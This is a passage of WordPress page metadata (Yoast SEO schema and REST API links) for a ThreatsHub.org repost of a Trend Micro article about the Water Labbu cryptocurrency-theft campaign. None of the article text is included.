\u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","og_locale":"en_US","og_type":"article","og_title":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2022-10-03T00:00:00+00:00","og_image":[{"url":"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/22\/water-labbu-cover.png","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency","datePublished":"2022-10-03T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/"},"wordCount":1700,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Crime","Trend Micro Research : Cyber Threats","Trend Micro Research : Research","Trend Micro Research : 
Web"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","url":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/","name":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","datePublished":"2022-10-03T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2022\/10\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.jpg","width":1619,"height":1345},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Water Labbu Abuses Malicious DApps to Steal Cryptocurrency"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 
SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 
Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/48736","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=48736"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/48736\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/48737"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=48736"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=48736"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=48736"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}